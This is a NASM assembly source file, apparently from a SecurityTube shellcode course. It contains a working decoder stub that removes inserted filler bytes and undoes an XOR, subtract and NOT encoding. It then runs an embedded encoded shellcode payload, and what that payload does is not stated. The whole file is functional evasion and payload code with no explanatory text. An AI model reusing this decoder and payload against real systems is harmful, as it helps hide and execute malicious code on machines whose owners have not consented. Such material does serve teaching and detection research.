; Filename: insertion-decoder.nasm
; Author:  Vivek Ramachandran
; Website:  http://securitytube.net
; Training: http://securitytube-training.com 
;
;
; Purpose: 

global _start			

section .text
_start:

	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx

	;;This is for the first byte
	xor byte [esi], 0x32	; xor
	sub byte [esi], 1	; -1 operation
	not byte [esi]		; not operation in beginning
decode: 
	mov bl, byte [esi + eax]
	xor bl, 0xfe
	jz short EncodedShellcode
	mov bl, byte [esi + eax + 1]
	mov byte [edi], bl
	
	xor byte [edi], 0x32	;xor
	sub byte [edi], 1	; -1 operation
	not byte [edi]		; not operation	

	inc edi
	add al, 2
	jmp short decode	

call_shellcode:

	call decoder
	EncodedShellcode: db 0xfd,0xb4,0x72,0x5b,0x82,0xe7,0xaa,0xf8,0xe3,0xe7,0xe3,0x81,0xbf,0xe4,0xaa,0x1d,0xaa,0x56,0xe3,0xf8,0xac,0x24,0xa5,0x2d,0xa0,0x7b,0x45,0x11,0x2f,0x41,0x82,0xd2,0x45,0xe2,0x2c,0xa6,0x9f,0x3f,0x45,0xc7,0x2d,0x22,0x62,0x5f,0xc7,0x4b,0x01,0xca,0xb2,0xba,0xfe,0xfe
